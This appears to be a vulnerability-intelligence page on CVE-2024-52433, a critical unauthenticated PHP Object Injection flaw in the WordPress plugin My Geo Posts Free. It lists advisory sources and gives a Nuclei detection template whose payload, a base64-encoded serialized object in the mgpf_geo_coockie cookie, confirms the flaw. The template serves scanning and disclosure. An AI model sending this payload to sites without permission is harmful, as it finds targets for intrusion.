My Geo Posts Free versions up to 1.2 vulnerable to PHP Object Injection allowing code execution.
Reporter | Title | Published | Views | Family All 6 |
---|---|---|---|---|
Patchstack | WordPress My Geo Posts Free Plugin <= 1.2 is vulnerable to PHP Object Injection | 15 Nov 202400:00 | – | patchstack |
Cvelist | CVE-2024-52433 WordPress My Geo Posts Free plugin <= 1.2 - PHP Object Injection vulnerability | 18 Nov 202414:23 | – | cvelist |
NVD | CVE-2024-52433 | 18 Nov 202415:15 | – | nvd |
CVE | CVE-2024-52433 | 18 Nov 202415:15 | – | cve |
Vulnrichment | CVE-2024-52433 WordPress My Geo Posts Free plugin <= 1.2 - PHP Object Injection vulnerability | 18 Nov 202414:23 | – | vulnrichment |
Wordfence Blog | Wordfence Intelligence Weekly WordPress Vulnerability Report (November 11, 2024 to November 17, 2024) | 21 Nov 202415:38 | – | wordfence |
id: CVE-2024-52433
info:
name: My Geo Posts Free <= 1.2 - PHP Object Injection
author: s4e-io
severity: critical
description: |
The My Geo Posts Free plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.2 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
reference:
- https://github.com/RandomRobbieBF/CVE-2024-52433
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/my-geo-posts-free/my-geo-posts-free-12-unauthenticated-php-object-injection
- https://patchstack.com/database/vulnerability/my-geo-posts-free/wordpress-my-geo-posts-free-plugin-1-2-php-object-injection-vulnerability?_s_id=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-52433
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-52433
cwe-id: CWE-502
epss-score: 0.00071
epss-percentile: 0.32461
cpe: cpe:2.3:a:mindstien:my_geo_posts_free:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: mindstien
product: my_geo_posts_free
framework: wordpress
tags: cve,cve2024,wordpress,wp,wp-plugin,my-geo-posts-free,php,injection
variables:
string: '{{rand_text_alpha(5)}}'
payload: 'O":20:"{{string}}":0:{}'
encrypt: '{{base64(payload)}}'
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: mgpf_geo_coockie={{encrypt}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Warning", "mgpf_get_geo_location()", "{{encrypt}}")'
- "status_code == 200"
condition: and
# digest: 4b0a00483046022100ab4cd14531554a30b8bb841e11c379ab0a1183d4278bded34298ceb903b2bdd4022100943dd81f27bb75cd96ade9516ca4b02c52df70616eb7be32b5604a88cc9f7c39:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo